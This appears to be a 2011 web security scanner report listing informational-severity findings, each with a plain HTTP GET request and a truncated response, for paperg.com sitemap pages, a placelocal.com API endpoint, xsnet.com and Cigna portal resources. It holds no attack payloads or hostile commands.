| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:19 GMT Content-length: 261 Content-type: text/html Set-Cookie: TLTHID=8C93EE5E7FD11 Set-Cookie: TLTSID=73F9C9687FD11 Etag: "f2e32241-1-0-105" Last-modified: Sun, 17 Jul 2005 20:01:07 GMT Accept-ranges: bytes <HTML> <HEAD> <META Http-Equiv="Cache-Control <META Http-Equiv="Pragma" Content="no-cache"> <META Http-Equiv="Expires" Content="0"> <META HTTP-EQUIV="Refresh" Content="0 ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /jsfb/embed.php | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:47:51 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 49236 var view_all_board = document.getElementById( if(view_all_board) view_all_board.style var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_roo ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap.php | 
| GET /sitemap.php HTTP/1.1 Host: www.paperg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:47:01 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 15656 <html> <head> <title>Flyerboard Directory</title> </head> <body> <h1>Flyerboard Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/albany-times | 
| GET /sitemap/albany-times Host: www.paperg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:47:36 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 1202 <html> <head> <title>Albany Times Union Flyer Directory</title> </head> <body> <h1>Albany Times Union Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/app.com/1992 | 
| GET /sitemap/app.com/1992 Host: www.paperg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:47:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 235 <html> <head> <title>APP.com Flyer Directory</title> </head> <body> <h1>APP.com Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/arizona-daily | 
| GET /sitemap/arizona-daily Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 6782 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Arizona Daily Star Flyer Directory</title> </head> <body> <h1>Arizona Daily Star Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/arizona-daily | 
| GET /sitemap/arizona-daily Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 845 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Arizona Daily Sun Flyer Directory</title> </head> <body> <h1>Arizona Daily Sun Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/bay-area-parent- | 
| GET /sitemap/bay-area-parent- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 653 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Bay Area Parent - East Bay Flyer Directory</title> </head> <body> <h1>Bay Area Parent - East Bay Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/bay-area-parent- | 
| GET /sitemap/bay-area-parent- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 676 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Bay Area Parent - San Francisco Flyer Directory</title> </head> <body> <h1>Bay Area Parent - San Francisco Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/bay-area-parent- | 
| GET /sitemap/bay-area-parent- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 680 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Bay Area Parent - Silicon Valley Flyer Directory</title> </head> <body> <h1>Bay Area Parent - Silicon Valley Flyer Directory</h1> <br /> <a href="http://www.paperg.c ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/bay-state-banner | 
| GET /sitemap/bay-state-banner Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 269 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Bay State Banner Flyer Directory</title> </head> <body> <h1>Bay State Banner Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/billings-gazette | 
| GET /sitemap/billings-gazette Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:15 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 10048 <html> <head> <title>Billings Gazette - Billings Gazette Flyer Directory</title> </head> <body> <h1>Billings Gazette - Billings Gazette Flyer Directory</h1> <br /> <a href="http://www.pa ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/billings-gazette | 
| GET /sitemap/billings-gazette Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:15 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 2048 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Billings Gazette - Thrifty Nickel Flyer Directory</title> </head> <body> <h1>Billings Gazette - Thrifty Nickel Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/birmingham | 
| GET /sitemap/birmingham Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:15 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 635 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Birmingham Parent Magazine Flyer Directory</title> </head> <body> <h1>Birmingham Parent Magazine Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/bismarck-tribune | 
| GET /sitemap/bismarck-tribune Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:17 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1890 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Bismarck Tribune Flyer Directory</title> </head> <body> <h1>Bismarck Tribune Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /sitemap/boston-blogs/116 | 
| GET /sitemap/boston-blogs/116 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:15 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 254 Connection: close Via: 1.1 AN-0016020122637050 <html> <head> <title>Boston Blogs Flyer Directory</title> </head> <body> <h1>Boston Blogs Flyer Directory</h1> <br /> <a href="http://www.paperg ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | /api.php | 
| GET /api.php?request=user Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=4d3oqoeopj | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:41:34 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:41:34 GMT Vary: Accept-Encoding Content-Length: 71 [false,"Sorry, we could not find this email address in our system.",[]] | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.xsnet.com | 
| Path: | /Portals/64787/foote | 
| GET /Portals/64787/foote Host: www.xsnet.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.xsnet.com/ Cookie: .ASPXANONYMOUS=XJ4on | 
| HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Wed, 27 Apr 2011 23:50:34 GMT Accept-Ranges: bytes ETag: "0c12ce6355cc1:101a8" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET Date: Mon, 16 May 2011 17:08:01 GMT Content-Length: 1751 <div class="footerInner"> <div id="left"> <ul> <li><a href="/it-maintenance <li><a href="/datacenter ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /ProviderTheme/themes | 
| GET /ProviderTheme/themes Host: cignaforhcp.cigna.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 318 content-type: text/plain date: Mon, 16 May 2011 15:31:58 GMT last-modified: Mon, 20 Dec 2010 18:20:32 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_32910a44-289d ..............(.......(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /corp/sso/styles/portal | 
| GET /corp/sso/styles/portal Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK accept-ranges: bytes content-length: 4554 content-type: text/css date: Mon, 16 May 2011 15:30:17 GMT etag: "110e-11ca-8685f4c0" last-modified: Mon, 18 Oct 2010 12:43:39 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server age: 81 <style> body { background-color : #FFFFFF; } .cignabody { font-family: "Arial", sans-serif; font-size: 11pt; color: #000000; } P, TD, UL, span { font-family: "Arial", ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /wps/CacheProxyServlet | 
| GET /wps/CacheProxyServlet Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/xhtml+xml date: Mon, 16 May 2011 15:31:37 GMT last-modified: Mon, 20 Dec 2010 22:55:42 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server cache-control: public, max-age=432000, post-check=172000 Content-Length: 102026 var wptheme_DebugUtils = { // summary: Collection of utilities for logging debug messages. enabled: false, log: function ( /*String*/className, /*String*/message ) { ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://maps.googleapis | 
| Path: | /maps/api/js/Authent | 
| GET /maps/api/js/Authent Host: maps.googleapis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com | 
| HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Mon, 16 May 2011 16:15:36 GMT Server: mafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 37 _xdc_._4yo50g && _xdc_._4yo50g( [1] ) | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://maps.googleapis | 
| Path: | /maps/api/js/Viewpor | 
| GET /maps/api/js/Viewpor Host: maps.googleapis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com | 
| HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Date: Mon, 16 May 2011 16:15:39 GMT Server: mafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 2789 _xdc_._7hwynl && _xdc_._7hwynl( ["Map data ..2011 Google",[["street_view",[ ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://maps.gstatic.com | 
| Path: | /intl/en_us/mapfiles | 
| GET /intl/en_us/mapfiles Host: maps.gstatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com | 
| HTTP/1.1 200 OK Content-Type: image/bmp Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT Date: Mon, 16 May 2011 16:15:36 GMT Expires: Mon, 16 May 2011 16:15:36 GMT Cache-Control: private, max-age=31536000 X-Content-Type-Options: nosniff Server: sffe Content-Length: 326 X-XSS-Protection: 1; mode=block ...... ......0.......(... ...@..................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| GET /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:31:05 GMT last-modified: Fri, 22 Apr 2011 16:46:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_cf31cef6-4b84 .PNG . ...IHDR.................... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://ol5u8o2ka38be | 
| Path: | /gadgets/makeRequest | 
| GET /gadgets/makeRequest Host: ol5u8o2ka38be34j62kt Proxy-Connection: keep-alive Referer: http://ol5u8o2ka38be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=209791819 | 
| HTTP/1.1 200 OK Expires: Mon, 16 May 2011 15:32:44 GMT Content-Disposition: attachment;filename=p.txt Content-Type: application/json; charset=UTF-8 Date: Mon, 16 May 2011 14:32:44 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public,max-age=3600 Age: 1 Content-Length: 379 throw 1; < don't be evil' >{"http://fcgadgets ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | https://sso.corp.cigna | 
| Path: | /corp/sso/includes/portal | 
| GET /corp/sso/includes/portal Host: sso.corp.cigna.com Connection: keep-alive Referer: https://sso.corp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:41 GMT Content-length: 2621 Content-type: text/css Set-Cookie: TLTHID=756B01F47FD11 Etag: "4ceaf758-1-0-a3d" Last-modified: Wed, 21 Jan 2004 14:36:30 GMT Accept-ranges: bytes <style> body { background-color : #FFFFFF; } P, TD, UL { font-family: "Arial", "Helvetica", sans-serif; font-size: 9pt; color: #000000; font-style: normal; } .body { ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://www.frontrowusa | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 404 Not Found Date: Mon, 16 May 2011 15:22:48 GMT Server: Apache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10 Not found! | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://www.paperg.com | 
| Path: | /jsfb/embed.php | 
| GET /jsfb/embed.php?view=all Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:47:51 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT P3P: CP="CAO PSA OUR" Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 49236 var view_all_board = document.getElementById( if(view_all_board) view_all_board.style var IMAGE_ROOT = 'http://www.paperg.com var flyerboard_roo ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://www.placelocal.com | 
| Path: | /api.php | 
| GET /api.php?request=user Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=4d3oqoeopj | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:41:34 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:41:34 GMT Vary: Accept-Encoding Content-Length: 71 [false,"Sorry, we could not find this email address in our system.",[]] | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://xsinternational | 
| Path: | /salog.js.aspx | 
| GET /salog.js.aspx HTTP/1.1 Host: xsinternational.app6 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.xsnet.com/ | 
